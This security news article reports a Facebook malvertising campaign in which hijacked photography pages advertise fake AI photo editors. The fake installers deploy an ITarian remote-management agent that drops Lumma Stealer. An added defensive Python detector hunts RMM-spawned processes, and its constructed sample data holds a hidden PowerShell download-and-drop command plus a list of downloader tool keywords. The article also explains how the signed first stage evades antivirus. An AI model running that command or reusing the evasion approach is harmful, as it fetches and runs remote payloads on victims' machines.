A Facebook malvertising campaign has been identified that targets users looking for AI image editing tools: paid ads lead to fake download pages that mimic legitimate software, and the "installer" they serve delivers information-stealing malware that harvests the victims' credentials.
The attackers leverage the growing popularity of AI-driven image-generation tools by crafting malicious websites that closely resemble legitimate services, thus luring potential victims into unknowingly infecting themselves with information-stealing malware. This was revealed by Trend Micro researchers who analyzed the campaign.
We take a look at how the fake AI ads and the password-stealing malware work in concert to target unsuspecting victims.
The attack begins with phishing messages sent to Facebook page owners or administrators, directing them to fraudulent account protection pages designed to trick them into divulging their login information.
Once the attackers have obtained these credentials, they hijack the victims' accounts, seize control of their pages, and proceed to publish malicious social media posts, which they then promote through paid advertising.
“We uncovered a malvertising campaign involving a threat actor that steals social media pages—typically those related to photography—by changing their names to make them appear connected to popular AI photo editors,” said Jaromir Horejsi, a threat researcher at Trend Micro.
Here is how the hijacked pages, the fake sites, and the password stealer fit together.
“The threat actor then creates malicious posts containing links to fake websites that closely resemble the official sites of legitimate photo editors. To drive traffic to these posts, the perpetrator boosts them through paid ads,” Horejsi added.
When Facebook users click on the URL promoted in the malicious fake AI ad, they are redirected to a fake webpage impersonating legitimate AI photo editing and generation software, where they are prompted to download and install a software package.
However, instead of receiving AI image editing software, the victims inadvertently install the legitimate ITarian remote desktop tool, configured so that it deploys a downloader, which in turn installs the Lumma Stealer malware. Because the first stage is a genuine, signed remote management tool rather than malware, the installer itself gives antivirus little to object to; the malicious behaviour lives in the configuration it carries and in what the agent is then told to run.
Once running, Lumma Stealer operates silently and lets the attackers collect and exfiltrate sensitive information such as credentials, cryptocurrency wallet files, browser data, and password manager databases.
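The defensive point of the chain above is that the dropper is a legitimate remote management (RMM) agent, so the thing to hunt for is not the agent but what it spawns. The following is an added example, not code from the page or from Trend Micro: a toy detector that walks constructed process-creation events (Sysmon Event ID 1 style fields, reduced to pid, parent pid, image and command line), finds every process descended from an RMM agent, and flags the ones that look like a stage-two download or an executable launched from a user-writable directory. The process name `rmmagent.exe` is a placeholder, not a verified ITarian binary name, and all events are constructed.

```python
"""Added example: hunt for the "legitimate RMM tool used as a dropper" pattern.

ASSUMPTIONS: "rmmagent.exe" is a placeholder process name (not a verified
ITarian binary); every event below is constructed sample telemetry.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the executable
    cmdline: str   # full command line


# Placeholder for the remote-management agent's process name (assumption).
RMM_AGENT_NAMES = {"rmmagent.exe"}

# Directories an ordinary user can write to; a dropped payload usually runs from one.
USER_WRITABLE_DIRS = (
    "\\appdata\\local\\temp\\",
    "\\appdata\\roaming\\",
    "\\users\\public\\",
    "\\downloads\\",
)

# Substrings typical of a stage-two downloader command line.
DOWNLOADER_MARKERS = ("downloadfile", "invoke-webrequest", "iwr ", "certutil", "bitsadmin", "curl ")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _rmm_ancestor(tree: Dict[int, ProcEvent], pid: int) -> Optional[ProcEvent]:
    """Walk the parent chain of `pid`; return the first RMM agent found, else None."""
    seen = set()
    cur = tree.get(pid)
    while cur is not None and cur.pid not in seen:  # `seen` guards against pid-reuse loops
        seen.add(cur.pid)
        parent = tree.get(cur.ppid)
        if parent is None:
            return None
        if _basename(parent.image) in RMM_AGENT_NAMES:
            return parent
        cur = parent
    return None


def detect_rmm_dropper(events: List[ProcEvent]) -> List[dict]:
    """Return one alert per suspicious process that has an RMM agent as an ancestor."""
    tree = {e.pid: e for e in events}
    alerts = []
    for e in events:
        if _basename(e.image) in RMM_AGENT_NAMES:
            continue  # the agent itself is legitimate software; judge its children
        agent = _rmm_ancestor(tree, e.pid)
        if agent is None:
            continue
        reasons = []
        if any(d in e.image.lower() for d in USER_WRITABLE_DIRS):
            reasons.append("executes from a user-writable directory")
        if any(m in e.cmdline.lower() for m in DOWNLOADER_MARKERS):
            reasons.append("downloader-like command line")
        if reasons:
            alerts.append({"pid": e.pid, "image": e.image, "rmm_pid": agent.pid, "reasons": reasons})
    return alerts


# Constructed sample telemetry mirroring the chain: fake installer -> RMM agent ->
# downloader -> payload from %TEMP%. Also a benign RMM session (notepad) as a control.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Users\alice\Downloads\AI-PhotoEditor-Setup.exe", "AI-PhotoEditor-Setup.exe /S"),
    ProcEvent(300, 200, r"C:\Program Files\RMM\rmmagent.exe", "rmmagent.exe --config site.cfg"),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/u.exe', $env:TEMP + '\u.exe')"),
    ProcEvent(500, 400, r"C:\Users\alice\AppData\Local\Temp\u.exe", r"C:\Users\alice\AppData\Local\Temp\u.exe"),
    ProcEvent(600, 1, r"C:\Program Files\RMM\rmmagent.exe", "rmmagent.exe --service"),
    ProcEvent(700, 600, r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\doc.txt"),
]


def run_demo() -> List[dict]:
    return detect_rmm_dropper(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

On the constructed sample, the installer launched from Downloads (pid 200) is not flagged on its own, and the notepad session under a separately started agent (pid 700) is not flagged either; only the PowerShell download (pid 400) and the payload executing from %TEMP% (pid 500) raise alerts, both attributed to the agent at pid 300. In a real environment, substitute the actual agent process names your organisation has approved and treat any RMM lineage you did not deploy as the stronger signal.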
The stolen data is subsequently sold to other cybercriminals or used by the attackers to compromise the victims' online accounts, steal their funds, and perpetuate further scams.
To guard against fake AI ads on Facebook, here are some recommendations from the Trend Micro researcher.
“Users should enable multi-factor authentication (MFA) on all social media accounts to add an extra layer of protection against unauthorized access,” Horejsi advised.
“Organizations should educate their employees on the dangers of phishing attacks and how to recognize suspicious messages and links. Users should always verify the legitimacy of links, particularly those that request personal information or login credentials,” he further emphasized.
Fake AI ads have also appeared on YouTube, so apply the same caution there and don't click on those either.